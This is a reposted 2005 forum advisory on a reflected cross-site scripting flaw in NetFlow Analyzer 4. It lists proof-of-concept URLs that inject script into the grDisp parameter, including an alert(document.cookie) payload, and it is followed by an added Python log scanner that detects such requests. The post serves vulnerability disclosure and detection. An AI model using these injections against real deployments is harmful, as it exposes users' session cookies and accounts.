EvilOctal Information Security Team Technical Discussion Group's Archiver

EvilOctal 2005-10-22 01:51

[Repost] NetFlow Analyzer 4 Cross-Site Scripting Vulnerability and Testing Method

Author: why (at) nsfocus (dot) com

I encountered cross-site scripting vulnerabilities in some files of NetFlow Analyzer 4. With these files, by sending a specially crafted URL you can execute commands on the client side.

____Proof of Concept______

http://192.168.10.7:8080/netflow/jspui/index.jsp?grID=-1&view=groups&grDisp=<h1>test</h1>
http://192.168.10.7:8080/netflow/jspui/index.jsp?grID=-1&view=groups&grDisp=<script>alert(document.cookie)</script>
http://192.168.10.7:8080/netflow/jspui/index.jsp?grID=-1&view=groups&grDisp=<script>alert("test")</script>
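
Added example, not part of the original post or of NetFlow Analyzer: a log check that flags requests to the path and `grDisp` parameter shown in the proof of concept when the decoded value carries markup. The Common Log Format layout, the sample lines and the assumption that a legitimate `grDisp` value is a plain name are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path and parameter come from the proof-of-concept URLs in the post.
TARGET_PATH = "/netflow/jspui/index.jsp"
TARGET_PARAM = "grDisp"
# Assumption: a legitimate grDisp value is a plain name, so these characters signal markup.
MARKUP = re.compile(r"[<>\"']")
# Request field of a Common Log Format line: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2006:10:00:01 +0000] "GET /netflow/jspui/index.jsp?grID=-1&view=groups&grDisp=Branch+Office HTTP/1.1" 200 5120',
    '10.0.0.9 - - [01/Jan/2006:10:00:07 +0000] "GET /netflow/jspui/index.jsp?grID=-1&view=groups&grDisp=%3Ch1%3Etest%3C%2Fh1%3E HTTP/1.1" 200 5131',
    '10.0.0.7 - - [01/Jan/2006:10:00:09 +0000] "GET /other/page.jsp?grDisp=%3Cb%3E HTTP/1.1" 404 310',
    '10.0.0.12 - - [01/Jan/2006:10:00:15 +0000] "GET /netflow/jspui/index.jsp?grID=-1&view=groups&grDisp=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 5150',
]

def suspicious_grdisp(log_line):
    """Return the decoded grDisp value if it contains markup, else None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    target = urlsplit(match.group(1))
    if target.path != TARGET_PATH:
        return None  # only the page named in the advisory is in scope
    # parse_qs percent-decodes the value, so %3C is compared as '<'.
    for value in parse_qs(target.query, keep_blank_values=True).get(TARGET_PARAM, []):
        if MARKUP.search(value):
            return value
    return None

def scan(lines):
    """Return (client_address, decoded_value) for every flagged line."""
    hits = []
    for line in lines:
        value = suspicious_grdisp(line)
        if value is not None:
            hits.append((line.split()[0], value))
    return hits

if __name__ == "__main__":
    for client, value in scan(SAMPLE_LOG):
        print(f"{client} sent markup in {TARGET_PARAM}: {value!r}")
```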
